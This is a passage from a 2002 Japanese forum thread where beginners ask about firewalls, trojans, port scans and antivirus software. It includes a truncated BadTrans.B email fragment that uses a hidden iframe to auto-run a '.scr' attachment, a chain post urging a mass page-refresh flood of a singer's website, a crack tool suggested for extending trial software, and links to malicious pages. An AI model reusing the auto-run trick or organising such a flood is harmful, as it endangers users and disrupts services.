p. [ネームサーバ] ns-kg001.ocn.ad.jp
p. [ネームサーバ] ns-kn001.ocn.ad.jp
y. [通知アドレス] db-admin@ocn.ad.jp
[割当年月日] 2001/11/27
[返却年月日]
[最終更新] 2001/12/25 19:39:40 (JST)
staff@db.nic.ad.jp

667 :yayaya:02/01/30 09:57
学校のセキュリティ破りたいんですが・・・
学校自身がサーバーもっててホムペ開こうとしたらブロックしよるんです
無理ですか・・・

668 :名無しさん@お腹いっぱい。:02/01/30 10:00
>667
自分のがっこ? タイーホされるからやめとけ。

669 :名無しさん@お腹いっぱい。:02/01/30 10:17
>>667
やぶったところでなにもできないからやめとけ

670 :665:02/01/30 10:41
ありがとう。
ではアタックしかけてきたこいつのアドレスは
665で載ってる通知アドレスなんですか?

671 :名無しさん@お腹いっぱい。:02/01/30 11:43
>>670
知らん。おまえがこいつにやられたっていったんだろ。
つか、『トロイを入れられそうになりました』が
誤認識かもしれんと思いたくなった。

672 :578:02/01/30 11:51
>641
教えてください。
もし訴えたとしたら最悪の場合、そのプロバイダ−
はどうなるのでしょう?


673 :IE5.5も6も重くて糞:02/01/30 12:01
これってBAD-TRANS.Bですか?

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="SETUP.DOC.scr"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgA

674 :665:02/01/30 12:10
今になってアタックを受けた形跡が
ノートンからなくなりました。
これはなぜですか?
クラッカーに証拠隠滅されたのですか?

675 :名無しさん@お腹いっぱい。:02/01/30 12:12
>>672
家宅捜索されるだろうね

676 :名無しさん@お腹いっぱい。:02/01/30 12:21
>>672
電気通信事業法違反なので、刑事的に以下のような刑罰を受けます。
さらに民事的に損害賠償や慰謝料を請求できるでしょう。

第四条(秘密の保護)
電気通信事業者の取扱中に係る通信の秘密は犯してはならない。

第百四条(第四条の罰則規定)
電気通信事業者の取扱中に係る通信の秘密を犯したものは一年以下の懲役又は三十万円以下の罰金に処する
二 電気通信事業に従事する者が前項の行為をしたとき二年以下の懲役又は五十万円以下の罰金に処する。
三 前二項の未遂犯は罰する。


677 :名無しさん@お腹いっぱい。:02/01/30 12:28
コピペしたら大事なとこが抜けてた。

四条の二
電気通信事業に従事する者は、在職中電気通信事業者の取扱中に係る通信に
関して知り得た他人の秘密を守らなければならない。その職を退いた後においても、
同様とする。


678 :yayaya:02/01/30 12:54
>>669 カスケード接続ならいけると思ってるんですけど、どうですか?
やっぱり無理っすか?

679 :名無しさん@お腹いっぱい。:02/01/30 13:02
( ´,_ゝ`)プッ 意味分かってないな

680 :名無しさん@お腹いっぱい。:02/01/30 13:07
>>679
ここは初心者スレ。それは言っちゃいけない。

>>678
カスケード接続で出来る。

かもしれない。

681 :名無しさん@お腹いっぱい:02/01/30 13:54
>>679( ´,_ゝ`)プッ 意味分かってないな

682 :名無しさん@お腹いっぱい。:02/01/30 14:05
>>681
オマエモナ

683 :名無しさん@お腹いっぱい:02/01/30 15:28
>>682 ( ´,_ゝ`)プッ 意味分かってないな

684 :名無しさん@お腹いっぱい。:02/01/30 15:34
>>683
ということにしたいのですね:)

685 :名無しさん@お腹いっぱい。 :02/01/30 15:50
https://grc.com/x/ne.dll?bh0bkyd2 へ飛んでチェックしてみたの
ですが、

他の全てのポートは close という結果が出たのですが、

139 NetBIOS Stealth!
There is NO EVIDENCE WHATSOEVER that a port (or even any computer)
exists at this IP address!

と、ポート139が閉まってないようなのです。

これをそのまま翻訳サイトで訳してみたのですが

139 NetBIOS秘密!
ポート(あるいは任意のコンピューターさえ)が存在するNO EVIDENCE WHATSOEVER
があります、このIPアドレス!

と訳のわからない日本語に訳されます。

どなたか、私にわかりやすく説明していただけないでしょうか?


686 :685:02/01/30 15:59
解決しました。

上の方にリンクが貼られている
http://www.upsizing.co.jp/news/report0426.htm
このURLに飛んで読んだところ、139は開いてるのではなく
その存在自体隠しているという意味だとわかりました。
どうもお騒がせしました。

687 :名無しさん@お腹いっぱい。:02/01/30 19:07
■石黒彩 札幌西陵高校卒業
■飯田圭織 札幌稲西高校→ 代々木高校(定時制卒業?)
■安倍なつみ 登別高校→通信制高校(中退)
■中澤裕子 福知山高校卒業→大阪で風俗嬢
■保田圭 君津商業高校中退→マックでバイト
■矢口真里 瀬谷高校中退
■後藤真希 日出女子高校中退
■吉澤ひとみ 不明
■石川梨華 中卒
■小川麻琴 柏崎市立東中学
■新垣里沙 横浜市立橘中学
■高橋愛 福井県春江町立春江中学
■紺野あさ美 札幌市立中の島中



688 :第三者中継可能cc.sookmyung.ac.kr:02/01/30 19:10
egret.sookmyung.ac.kr (pri=20)接続に失敗:ネットワークが混雑しているか、サーバが停止している可能性があります。
cc.sookmyung.ac.kr (pri=10)
< 220-InterScan Version 3.6-Build_1166 $Date: 04/24/2001 22:13:0052$: Ready
< 220 cc.sookmyung.ac.kr ESMTP Sendmail 8.9.3/8.9.3;> HELO rlytest.nanet.co.jp
< 250 cc.sookmyung.ac.kr Hello localhost [127.0.0.1], pleased to meet you
> MAIL FROM:< http://www.nanet.co.jp/rlytest/requestedfrom@cc.sookmyung.ac.kr >
< 250 < http://www.nanet.co.jp/rlytest/requestedfrom@cc.sookmyung.ac.kr >... Sender ok > RCPT TO:<rlytest@nanet.co.jp> < 250 <rlytest@nanet.co.jp>... Recipient ok
> QUIT< 221 cc.sookmyung.ac.kr closing connection
問題あり:不正な中継を受け付けます。
(203.252.201.4)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。

689 :名無しさん@お腹いっぱい。:02/01/30 19:11
(゚Д゚)ハァ?

690 :名無しさん@お腹いっぱい。:02/01/30 20:57
>>696
ファイアウォールを適切に設定してればすべてStealthになるYO!

セキュリティに興味があるならこのへんのセキュリティチェックもやってみるといい。
これもちゃんとしてればすべて問題なしになる。
http://hackyourself.com:4000/startdemo.dyn

691 :名無しさん@お腹いっぱい。:02/01/30 21:14
隣の机の人のパソコンが、突然「エリーゼの為に」を鳴らすんですけど、
ボリュームコントロールも全然効かないし、電源落とすまでずっとでかい音で、
悪趣味な着メロみたいなメロディーを延々と聞かされます(拷問に近いものがあります)。
お隣の人は、原因がわからないそうですが、もしかしてこういうウイルスがあるんでしょうか。
でもウイルスデータベースやいろいろ調べても、それらしいのは見つからないし…。
同じような経験ある方いらっしゃいませんか?

692 :名無しさん@お腹いっぱい。:02/01/30 22:01
>690さん
NIS2002入れててファイアウォール設定を最高にしてますが
3つしかstealthになりませんのですが。

693 :名無しさん@お腹いっぱい。:02/01/30 22:07
>>690 (゚Д゚)ハァ?

694 :名無しさん@お腹いっぱい。:02/01/30 22:19
なにか間違ったこといってるか?おれも全部ステルスだが。

695 :名無しさん@お腹いっぱい。:02/01/30 22:42
Norton Internet Security 2001 Ver.3.0の体験版を一度インストールし、
試用期間が終了したのでアンインストールしました。
その後、また使いたくなったのでインストールしようとしたら、途中で
バグったような感じになったのでキャンセルを押したのですが何故か
インストールされたことになりました。
Windowsmeを起動すると、ノートンアンチウィルスは初期化されませんでした
と赤い背景で表示され、
アンインストールしようとするとNorton AntiVirusのnav95.isuが無いので無理と表示され、
コントロールパネル、システムの復元、Cドライブの中身がウィンドウは
開けるのですが見ることも選択することも出来なくなりました。

win板の方の助言でもっかいインストールしてみましたが、だめでした。
どういうことが問題なのかもさっぱりわかりません。
誰か助けてください。。。

696 :名無しさん@お腹いっぱい。:02/01/30 22:43
書くとこ間違えました・・・

697 :名無しさん@お腹いっぱい。:02/01/30 23:13
>>692
私はTinyなのでNISはよく分かりませんが、stealthじゃなくてもcloseなら良いと思います。

>>691
だれかのいたずらではないですか?w

698 :名無しさん@お腹いっぱい。:02/01/30 23:38
>>690
いや間違ったことは言ってないが、誰へのレス?

699 :名無しさん@お腹いっぱい。:02/01/31 01:40
>>695
第一に、試用版なので期限が切れたらもう一度入れたってソフトは動かない。
期限残してアンインストールしても日数はカウントされている。
第二に、インストール中変な操作をしたためファイル内容が狂ってて、まと
もに起動できない状態な上にアンインストールに必要なisuファイルもできて
ない。結論としてこれ以上ソフトのインストールをやっても無駄なので、
OS入れ直しだね。HDD内容全部抹消すればソフトのインストールで
また30日使えるようになるけど。

700 :名無しさん@お腹いっぱい。:02/01/31 01:56
DateCracker2000

701 :(゜▼゜*):02/01/31 02:19
>>695
起動ディスクで立ち上げて
SCANREG /RESTORE
で、いい状態のバックアップ(日付で判断)から
復旧したら、ひょっとしたら治るかもしれない。

702 :EXE:02/01/31 10:43
多段プロキシってどこにあるん?

703 :名無しさん@お腹いっぱい。:02/01/31 11:04
>>702
板違い

704 :名無しさん@お腹いっぱい。:02/01/31 18:25
>>702
そんなものはない。プロキシを何個も刺して、多段にするんだよ。

705 :名無しさん@お腹いっぱい。:02/01/31 19:02
ノートンインターネットセキュ使ってます。

Date: 2002/01/31 Time: 3:56:17
Rule "Default Block NetBus Trojan horse" blocked (172.170.170.133,NetBus(12345)). Details:
Inbound TCP connection
Local address,service is (172.170.170.133,NetBus(12345))
Remote address,service is (172.170.170.234,1199)
Process name is "N/A"

これ今日4回きました。
これにはどう対処すればいいのですか?
まったくの初心者でごめんなさい。

706 :名無しさん@お腹いっぱい。:02/01/31 19:06
>>705
初心者は見なかったことにする。これ。

707 :名無しさん@お腹いっぱい。:02/01/31 19:08
((*'д'*))教えてください・・・
オネガイシマス。

708 :名無しさん@お腹いっぱい。:02/01/31 19:09
>>705
AOLのちがうユーザーさんからのアタック?もしくは検知ミス

709 :名無しさん@お腹いっぱい。:02/01/31 19:13
>708
そうだと思います。見当はついていますが、はっきりしません。
というのは、前に一度その人にトロイを仕込まれたことがあって、それから
「もうしない」とは言ってはいるものの、いまいち信用できないんです。

710 :名無しさん@お腹いっぱい。:02/01/31 19:14
あと、上のコピペでワタシの情報はばれるもんなんですか?
このコピペはどういうふうに見たらいいんでしょうか。

711 :名無しさん@お腹いっぱい。:02/01/31 19:20
とりあえずプロバイダがAOLだと分かる。
ポートが開いてないかスキャンされています(この場合 ポート12345 トロイの木馬NetBusで使用)

あなたのPCにトロイが入ってない限りポートスキャンされても平気です。


712 :名無しさん@お腹いっぱい。:02/01/31 19:22
そうなんだぁ
ありがdございました!

トロイ入ってないことを祈ってmath

713 :705=712:02/01/31 19:55
どうでもいいけどまた同じ人からアタックきました。

714 :名無しさん@お腹いっぱい。:02/01/31 20:01
madokaに感染した場合、どうすればいいでしょうか?

715 :名無しさん@お腹いっぱい。:02/01/31 20:13
>>714
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JOKE_MADO.A

実行しなければ感染しないんだが。

716 :名無しさん@お腹いっぱい。:02/01/31 21:28
「悪意あるプログラム」ってどうやって検出すればいいんですか?

717 :名無しさん@お腹いっぱい。:02/01/31 21:32
crazyghostってヤバイですか。

718 :名無しさん@お腹いっぱい。:02/01/31 21:42
ヤバくない

719 :名無しさん@お腹いっぱい。:02/01/31 21:44
かなりヤバイ。
多分お前捕まる、もしくは殺される

720 :名無しさん@お腹いっぱい。:02/01/31 21:51
>>716
まず、「悪意」を定義しろ。


721 :tryingtokeepup@yahoo.com:02/01/31 23:14
Received: from cc.sookmyung.ac.kr (203.252.201.4) by sitemail.everyone.net with SMTP; **
Received: from vv68gIjB6 (localhost [127.0.0.1]) by cc.sookmyung.ac.kr (8.9.3/8.9.3) with SMTP id ** (KST)
From: tryingtokeepup@yahoo.com
Date:**
Subject: Need Help? Benefactored Program...hurry don't miss out!
---
Hello Friends,
If you need HELP and would like to be benefactored
into a new FABULOUS
program, please let me know right away!! I will put
you into a
"temporary" matrix to hold your position until the
company allows us to enter
people on Feb. 4! The overflow will be enormous.
Please reserve your
spot now!
Send your info to
benefactored@yahoo.com
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to me tryingtokeepup@yahoo.com
---
egret.sookmyung.ac.kr (pri=20)
接続に失敗:ネットワークが混雑しているか、サーバが停止している可能性があります。
-----
cc.sookmyung.ac.kr (pri=10)
< 220-InterScan Version 3.6-Build_1166 $Date: 04/24/2001 22:13:0052$: Ready
< 220 cc.sookmyung.ac.kr ESMTP Sendmail 8.9.3/8.9.3;
> HELO rlytest.nanet.co.jp
< 250 cc.sookmyung.ac.kr Hello localhost [127.0.0.1], pleased to meet you
> MAIL FROM:< http://www.nanet.co.jp/rlytest/requestedfrom@cc.sookmyung.ac.kr >
< 250 < http://www.nanet.co.jp/rlytest/requestedfrom@cc.sookmyung.ac.kr >... Sender ok
> RCPT TO:<rlytest@nanet.co.jp>
< 250 <rlytest@nanet.co.jp>... Recipient ok
> QUIT
< 221 cc.sookmyung.ac.kr closing connection
問題あり:不正な中継を受け付けます。
(203.252.201.4)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。

722 :名無しさん@お腹いっぱい。:02/01/31 23:17
>>721
ウザい

723 :名無しさん@お腹いっぱい。:02/01/31 23:23
最近暇にまかせてセキュリティ厨になってるんですが、
NIS2002,BlackIce,Proxomitron,Ad-aware,Javaオフ、クッキーオフ
にしてあるんですが他にセキュリティ向上のためにできることはありますか?
あとOutlookは使っていません。

724 :名無しさん@お腹いっぱい。:02/01/31 23:28
・ 知らない人に話しかけられてもついて行かない
・ 外から帰って来たら手を洗ってうがいをする
・ 暖かくして寝る(寝る前にホットミルクなどを飲むと良い)

725 :>722 抗議はメールでくれ:02/01/31 23:29
  

726 :名無しさん@お腹いっぱい。:02/01/31 23:40
>>724
ごめん、つまらない

727 :名無しさん@お腹いっぱい。:02/01/31 23:49
               ∧_∧
  ∧_∧ エイッ!    (゚Д゚__)←>>726
 ( ´∀`)         ⊂_⊂| 〃´
 (つ===つ===========≠ /=⇒
 | | |       ⊂_⊂ノ ヾ`
 (__)_)

728 :名無しさん@お腹いっぱい。:02/02/01 00:47
>>723
・ネットに繋がない。
・FD、CD、MOその他リバーシブルディスクを持ち込まない。

729 :名無しさん@お腹いっぱい。:02/02/01 03:02
>>728
リバーシブルワラタ

730 :名無しさん@お腹いっぱい。:02/02/01 03:27
かろうじてヒットしてる。

http://www.google.com/search?q=リバーシブルディスク&hl=ja&lr=lang_ja

731 :名無しさん@お腹いっぱい。:02/02/01 04:55
Comment: For info see http://www.gnupg.org

mQGiBDxZoIYRBACSeBXDLEfXfW9IGh0kclU59O7Yw5oLye2gSF77nyaR6+eGh/Qs
RrQ8N/i0366CtPPFMAJEHdR/6atK9gYvHMs/IEssDr6bK7w8fQj0txazJwHAzd4P
9jTa4D0mU4a6Ab6gUO6hYe3A9Jqrs5EjDoKr4F815Au3BomkLg5spdSqAwCgi1nT
aED2RyurLKz2cIczFt5ClUED/RVIK9d0DOutZQjnhFLL8HBPnOWOv/8fBEk+b8Wo
i1t9sc2XXzh8PDu2OHMuyx7R+v7Psm6j4q1pwpRS88YW3kHW0rj5qeoebk1eyNfN
IEQk0Zh/ZpQjgXERm9zt6plLP1+/nhbAeay/WuZYbucK6dUJC4wdc+INUTAsCcJj
wy9eA/9eTXRHg0mEC6WUIq45yV8ADH1HI4my2F6BVSeU0z6OaHhg9iC9deJUMz5+
Lak0cn/Fn3cIw+sS3qJ8Qx+kiAai9p2lHJzRu9OLXLkJh0UJ16FQ7FpG7sacvEb8
OFCOkdGNGLHiA+hTM1dPkPFhBPfkaPL+v9QWGqdtbmyRVO9z7rQaaG9nZWhvZ2Ug
PGluZm9AYTRldmVyLm5ldD6IVwQTEQIAFwUCPFmghgULBwoDBAMVAwIDFgIBAheA
AAoJEDQ0Pppzr2MIs7AAn07qHUgEatuvV6icxH+Ou6NksKXvAJ9EguDqXWpdjW1p
acW8NkT8AN1NgrkBDQQ8WaCMEAQAgwouJcKLAC2w7dsgsjNFK+fu3BSOlk1ms/il
aaB3dRtyA9DabW7wWOW80EN18szv7C1FrO1/a1OZWURz40TvtAVP+Hx5ZjrxEf6G
XfOnOa28D611bGMrmwSHRS5BqDjmNAiqI53JtMMM15grIY1R9EZ9XetRcDnqjcPv
br3UdGcAAwcD/AjuALtZH6L+L+VWm2iqj6OhZg8stUPchRyqSlAPaZmUiSHkSJxm
+DOG+PYqsxPR4C0F1Lm8rr6wc3nf7BiSUPFK6A0VetaUU374lN/DQ4K5HXchkCU0
KSlg8l7ISimCil4mwEl+YtI6TwsXfkcThXiKMm/P5ZtWQSNxcWpY3SJeiEYEGBEC
AAYFAjxZoIwACgkQNDQ+mnOvYwiwSACfda4sRD0uLLkrSowE9ZIoUiacOCAAn3cU
ft5aDXdlFmiroWs/KHlmR+Dx
=PYrs
-----END PGP PUBLIC KEY BLOCK-----

732 :名無しさん@お腹いっぱい。:02/02/01 12:21
ノートンアンチウイルスってスパイウェアも検出すんの?

733 :名無しさん@お腹いっぱい。:02/02/01 12:30
それは無理

734 :名無しさん@お腹いっぱい。:02/02/01 12:34
OutpostでWinMX使う時はICQプリセットにしておけばいいのですか?

735 :名無しさん@お腹いっぱい。:02/02/01 12:39
Ad-aware って日本語?

736 :名無しさん@お腹いっぱい。:02/02/01 13:22
>>734
板違い

>>735
違う

737 :名無しさん@お腹いっぱい。:02/02/01 13:27
セキュリティソフトを買いたいんですが
初心者の私に向いているのってありますか?
今、私のPCにはセキュリティソフトが入ってないので
かなり恐いです。
最近はメール見るだけで感染するウイルスとかありますし・・・。
前にINSで、上手くいかずにアンインストールしてますし
今度は慎重に選択しようと思ってます。
一体、どれが一番使いやすいのか・・・。


738 :名無しさん@お腹いっぱい。:02/02/01 13:34
>>737
INSってNISの打ち間違いか?
だったらウイルスバスターにしとけば?
いくらうまくいかなくてアンインストールしたからと言って
無防備のままネットに繋ぐのはある意味あなたが犯罪

739 :妄想野郎 ◆WqONWcU2 :02/02/01 16:42
ここでいいかなぁ?

自分の自宅、または携帯電話の電話番号がネット上で晒されている
可能性がある場合、該当のサイトを探すのに一番適した方法を教えて下さい。


740 :名無しさん@お腹いっぱい。:02/02/01 16:48
http://www.google.co.jp

741 :名無しさん@お腹いっぱい。:02/02/01 17:24
ttp://myhome.hananet.net/~crazyghost/goto.htm
最近このアドレスをよく見かけるんですけどヤバイのでしょうか?
何がどのようになるのか教えてください。
スレ違いならごめんなさい

742 :名無しさん@お腹いっぱい。:02/02/01 17:29
>>741
女の幽霊の画像が貼ってあるだけ。
作り物っぽいし、正直言って恐くなかったYO!

743 :名無しさん@お腹いっぱい。:02/02/01 18:32
インターネットセキュリティ体験版をインストールしましたが
製品登録で「SSLを経由した接続が確立できません」となってしまいます。
どんな原因が考えられるのでしょうか?
Win2k,eAccessです。


744 :名無しさん@お腹いっぱい。:02/02/01 18:40
質問してもいいけど回答に何の反応もないのね
いやになっちゃう
回答に関してレスしてくれる人には答えてあげてもいいけど

745 :名無しさん@お腹いっぱい。:02/02/01 18:42
http://gakielkupo.tripod.com/index.html

ここにおいてあるのはシステム破壊プログラムですか?

746 :名無しさん@お腹いっぱい。:02/02/01 18:58
>>743
なぜ体験版を登録するんですか?

747 :名無しさん@お腹いっぱい。:02/02/01 19:19
AD-Awareってなんて読む?

748 :名無しさん@お腹いっぱい。:02/02/01 19:33
あど・あわれ

749 :名無しさん@お腹いっぱい。:02/02/01 19:39
>>746
登録しないもんなんですか?
登録とライセンスキー購入は別だと思ってたんですが。
厨房な質問ですみませんでした。

750 :妄想野郎 ◆WqONWcU2 :02/02/01 20:30
・・・普通のサーチエンジンごときで探せたら苦労しねぇよっての。
あほか?

それにどうせ薦めるならちったぁまともに電話番号検索できる
http://www.lycos.co.jp/
の方を薦めろよ。タコ。


751 :名無しさん@お腹いっぱい。:02/02/01 20:37
>>750
        ∫
   ∧,,∧ ∬       / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   ミ,,゚Д゚ノ,っ━~  < ふぅ。 逆ギレですか? みっともない。
_と~,,,  ~,,,ノ_. ∀  \______________
    .ミ,,,/~),  .| ┷┳━
 ̄ ̄ ̄ .し'J ̄ ̄|... ┃
 ̄ ̄ ̄ ̄ ̄ ̄ ̄   .┻

752 :名無しさん@お腹いっぱい。:02/02/01 20:53
VINTAGE SOLUTIONSの簡易版アンチドートで「Trojan.Win32.Vise感染」と
認識されるファイルがあるんですが、トレンドマイクロのオンラインスキャン
ではそのファイルは感染なしとでます。また各社のウイルス辞書で
Trojan.Win32.Viseを検索しても該当するウイルス名が見当たりません。
Trojanなんとかってのはいっぱいでてきたんですけど・・・。


753 :名無しさん@お腹いっぱい。:02/02/01 21:24
Safeモードになってしまう理由って何ですか?
ネット見てて、フリーズした挙句、画面が青くなって例外なんとかが・・・っていうメッセージのあとどうにも動かないんでリセットボタンで電源落として再起動したらSafeモードになったんです。
Win98 IE5sp2です。

754 : :02/02/01 22:20
>>753
理由はWinが気を利かせてくれているから。
周辺機器がらみでよくブルーバックエラーが起こることが多いし、
それで正常終了しなかった場合には、HDDなどに問題が生じている
可能性があるので、セーフモードで十分調べなさいってこと。
とりあえずセーフモードでスキャンディスクとかやって
大丈夫なようなら再起動すると通常になるはず、
ならなかったら、Ctrlキーとか押しながら立ち上げると、
起動モードを選べるので、ノーマルを選ぶといい。
多分ctrlキーでいけるはず。

755 :名無しさん@お腹いっぱい。:02/02/01 23:26
zonealarmについて質問っす。
小規模な家庭内のLAN作ってます。
構成は、
ブロードバンドルーター with DHCP
ルーターのIP:192.168.2.1
クライアント数:2台
クライアントIP:DHCP
範囲:192.168.2.2〜192.168.2.40
サーバー:現時点ではなし(ファイルサーバーとプリントサーバー近日予定)
です。

で、zoneのセキュリティ-advancedの設定について。
LAN内のPCをローカルにしてやらないとイカンと思うですが、この場合、
other computersでIPrangeを設定すりゃいいかと。
そのrangeの開始IPの値は
192.168.2.1 (ルーター含む)
192.168.2.2 (ルーター含まない)
のどっちにするんでしょーか?

それと、アダプターサブネットの項目にNICが出てるんですが、コイツには
チェック入れないとイカンですか?

以上、教えてみろ。
よろしくお願いします。



756 :cheshire-cat:02/02/01 23:55
んな小規模のLANでDHCP立ち上げること自体間違っているかと。
IPアドレスの設定を自動じゃなくて、個別に指定しなければ意味ないんじゃ?
ちなみにローカルなら、わざわざ推奨されたIPアドレス使う必然性は無い。


757 :名無しさん@お腹いっぱい。:02/02/02 00:17
SubSeven Trojan horseというのに侵入されそうになったんですが、
こいつはすでに何か内部に仕込まれているんですか?
トロイの木馬だからもう内部にいるのかと思ったのですが。

758 :755:02/02/02 00:35
>>756

>んな小規模のLANでDHCP立ち上げること自体間違っているかと。
ってか、ルーターのマニュアルでデフォでDHCP使うように
なってたから、そのまんまにしてるだけなんす。
あんまりよくわからんし・・・

>IPアドレスの設定を自動じゃなくて、個別に指定しなければ意味ないんじゃ?
>ちなみにローカルなら、わざわざ推奨されたIPアドレス使う必然性は無い。

つまり、テキトーなローカルIPを各端末ごとに設定、ってことですな。
その方がいいんであれば、そうするです。
ただ、この場合もルーターのIPも明示的にローカルとしなきゃいけない
んでしょーか?


759 :名無しさん@お腹いっぱい。:02/02/02 01:57
浜崎あゆみファンサイトの掲示板を潰すのもいいだろう。
チャットを乗っ取るのもいいだろう。
しかし、それはあくまで序章に過ぎない。
来たる2002年2月2日22時22分22秒、2ちゃんねるによる本丸攻略が開始される・・・

公式サイトがF5連打で攻め落とされるか、それとも攻略に失敗するか、いざ勝負!
公式サイト   http://www.avexnet.or.jp/ayu/

事の概要
カウントライブでの出来事。 アンコールの後、浜崎のMCが始まった。
その時最前近くにいた客が座った。 すると浜崎が「なにあれ、座ってる。感じ悪。どうよこれ?」 と客に同意を求めたところ当然客からはその子にブーイング。
その子は足が悪い子でたまたま座っただけだったのに 浜崎はそれを知らずにその子を非難した。
その子は泣き出すし大変だったらしい。
このレスをみて同意した方は同じ文面を手近なスレに貼り付けてください。多いほど良し!
詳細は↓ココで
http://tv.2ch.net/test/read.cgi/ami/1012570770

760 :名無しさん@お腹いっぱい。:02/02/02 02:06
>>759
チェーンレスやめれ

761 :名無しさん@お腹いっぱい。:02/02/02 02:23
ブラクラ・ウイルスです!!
ttp://www.geocities.com/ccsacla/images0012.jpg

これを開いてしまい即、強制終了させましたが、どのような害があるでしょうか?
20分くらい前にやってしまったのですが今のところ異常はありませんが
非常に心配です。素人なんでどうすればいいのか教えてください・

762 :名無しさん@お腹いっぱい。:02/02/02 02:46
>>761
レジストリ書き換えやら、mailtoストームやら、conconやら
いろいろ複合されてて、ややこしい。
とりあえずスタートページが書き換えられてるはずだが、
直し方はよーわからん。
起動ディスクで立ち上げて、scanreg /restore で
踏む前のレジストリを選べば直りそうな気もする。

763 :名無しさん@お腹いっぱい。:02/02/02 04:19
なんかVB2002のPFWがsub seven ブロックしたって
言ってんですけどその送信元が自分のIPなんです。
で送信先は62.71.168.19になってるんだけど
これって感染しちゃってるんでしょうか?

ウイルス検索はしてみましたが感染は検知
されなかったです。

764 :名無しさん@お腹いっぱい。:02/02/02 04:45
プライスロトはなんだったの?

765 :名無しさん@お腹いっぱい。:02/02/02 05:07
>>763
VB2002のFW機能って、アウトバウンドは監視しましたっけ?
単にsub seven のポートにアクセスされただけでは?


766 :エフェドリンながヰ:02/02/02 05:41
http://www.puchiwara.com/hacking/
これなんかいいと思うのだが……‥‥・・
  「いっせー」
   /■\  /■\
  ( ・∀・) ( ´∀`)
 ⊂    つ⊂    つ
  .人  Y   人  Y
  し'(_)   し'(_)
  「のー」
   /■\  /■\
  (・∀・ ) (´∀` )
 ⊂、   つ⊂、   つ
    Y 人    Y 人
   (_)'J   (_)'J
  「で」
  /■\  /■\
 ( ・∀・ ) ( ´∀` )
 ( つ⊂ ) ( つ⊂ )
  ヽ ( ノ  ヽ ( ノ
 (_)し'  (_)し'
   「あげ!!」
  /■\   /■\
 ∩ ・∀・)∩∩ ´∀`)∩
  〉     _ノ 〉     _ノ
 ノ ノ  ノ  ノ ノ  ノ
 し´(_)   し´(_)

767 :名無しさん@お腹いっぱい。:02/02/02 05:45


768 :757:02/02/02 05:46
>>763
自分も同じトロイが来たよ。
昨夜はなにかあったのかなあ?

769 :716:02/02/02 08:18
「悪意あるプログラム」について。
これは,どこかのネットセキュリティの協会の語で,幅広く定義されているようです。
で,以前「LOVE MACHINE」というツールをDLぢて使っており,その後もHDDの中に
入れたままなんですけど,これどうでしょう?

770 :おしえてください:02/02/02 08:27
博識に富む先生方に御教授いただきたく、質問をします。よろしくお願いします。
ネット上でプライバシーの問題が叫ばれる現実を鑑みて
今日初めて特命プロクシを設定してみました。
しかしひとつ疑問があります。
プロキシつかったまま例えばウェブメールにログインしたとしたら、パスワード等が
プロクシ側に漏れるんじゃないですか?大丈夫ですか?

771 :名無しさん@お腹いっぱい。:02/02/02 09:01
>>761
本当大馬鹿なんですけど、
ブラクラ踏んだ時のスクリーンショットかと思って、
(よく考えたらブラクラ踏んでそんなのんきな事する奴いないか…)
クリックしてしまいました。
プログラム起動時に音を鳴らすようにしてるんだけど、
その音が鳴りっぱなし。こわかったー。
すぐ再起動して>>762のやり方でレジストリ復活させました。
スタートページも変わってなかったし、OE使ってないし、
IEにも最新パッチ当ててるし、特に変わったこともないので、
ちょっと安心してるんですが。
本当、こういうので気をつけなくちゃって思いますね。

772 :名無しさん@お腹いっぱい。:02/02/02 09:06
>>770
博識にも富んでいないし、先生なんてとんでもないが。

一つ疑問があるが、特命って匿名か?
何か特別なプロキシのことなら俺は知らないぞ。
まあ、それはおいといて。

そういう心配があるなら、プロクシは使わない方がいいね。
絶対に安全とはいえないもの。
使うんだったら、管理者はそういう信義に反することはしないと
信用するか、
膨大な情報の中から、特にパスワードを抜き出すのは
とても大変だろうからと安心するか、
でないと。

773 :   :02/02/02 09:09
みなさん、こんばんは。
しばらくは、オフ会の案内を最初に書き込ませていただきますのご了承願います。
今回で3回目になるオフ会を3/2(土)の16:00位から、都内某スペースで開催します。
普段は出来ない靴談議に花を咲かせて、心地よい一時をすごしませんか。
テーブルには自然と靴が並び、靴好きにとっては、見ているだけでも話がとても盛り上がります。
今回は、特別なゲストとして、雑誌などによく登場なさいます靴関連のジャーナリストの井伊さんにも参加いただける運びとなっています。
さらには、ある方のご協力により、靴爆買いヨーロッパツアー実現に向けての取り組みもスタートします(アンケートなどの実施)。
敷居は高くなく、とっても気さくな雰囲気ですので、初めての方でも、気軽に参加して下さい。
いわゆる本格靴を持っていなくてもいいですし、服装も自由とさせていただいています。
参加希望の方は、お手数ですが、2/25までにメールを下さい。
メールをいただいた方だけに、開催場所等の連絡をさせていただきます(2/25以降)。

まだ会社です。


774 :名無しさん@お腹いっぱい。:02/02/02 09:42
>>772
上り(のPOST)だけキャプチャするだけだから意外と簡単よん。

775 : :02/02/02 09:51
すいません、フリメのアドレスを公開した途端、デスクトップに「mitene」という
名前のメールらしきアイコンが突然現れました。これはんでしょうか?
怖いので開いていないのですが。

776 :名無しさん@お腹いっぱい。:02/02/02 09:58
もう侵入されている。有料エロサイトへの誘導だと思う。
ダイアルアップの設定が書き換えられていないか確認しろ。
右クリックでプロパティを確認しろ。
その時に送られたメールをここに貼り付けろ。

777 : 775:02/02/02 10:09
>>776
メールには何も送られてきてないです。一応、ケーブルでつないでいるのですが。

778 :名無しさん@お腹いっぱい。:02/02/02 10:45
>>777
捨てればいいでしょ、そんなファイル。

しかしメールを受け取ってないのにそんなファイルができるとは
考えられないね
ウイルス対策してないのかな?

779 :名無しさん@お腹いっぱい。:02/02/02 10:56
>>777 共有してて親切な人が教えてくれたとか。

780 :名無しさん@お腹いっぱい。:02/02/02 11:41
ノートンアンチウイルス2002ですがウイルススキャンを
システム起動時にスケジュールしているのですが
スキャンをしたりしなかったりです。
どうしてでしょう?
WinXPでzoneも使っています。

